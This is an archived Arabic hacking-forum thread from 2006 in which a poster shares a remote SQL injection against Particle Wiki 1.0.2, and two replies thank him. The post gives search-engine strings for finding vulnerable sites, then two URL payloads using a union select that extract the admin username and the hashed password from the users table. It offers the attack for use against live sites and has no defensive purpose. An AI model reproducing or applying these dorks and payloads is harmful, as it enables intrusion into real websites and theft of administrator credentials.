المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : Particle wiki <= 1.0.2 Remote SQL_Injection


AG-Spider
05-06-2006, 11:08
بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

Particle wiki <= 1.0.2 Remote SQL_Injection

ثغرة في قاعدة البيانات تجلب لك يوزر الادمن والباسورد مشفر

ابحث عن التالي

All rights reserved. Powered by Particle Wiki 1.0.2

او التالي

Powered by Particle Wiki 1.0.2

او التالي

Particle Wiki 1.0.2

لاحظ معايا الصور

http://spider.5gigs.com/explo/wiki/1.jpg

http://spider.5gigs.com/explo/wiki/2.jpg

الاستغلال هنا لجب اليوزر

index.php?version=-1%20union%20select%201,1,1,1,1,username%20from%20p wiki_users%20/*


الاستغلال هنا لجلب الباس المشفر

index.php?version=-1%20union%20select%201,1,1,1,1,password%20from%20p wiki_users%20/*


وتحياتي للجميع
AG-Spider

حليب السعوديه
06-06-2006, 12:45
احسنت يا شيخ ابدعت فعلا و مشكور علي الثغره و الشرح المبسط فيه و المصور ايضا

mom3gool
07-06-2006, 09:08
يعطيك العافيه

ودمت بود
ولك جزيل الشكر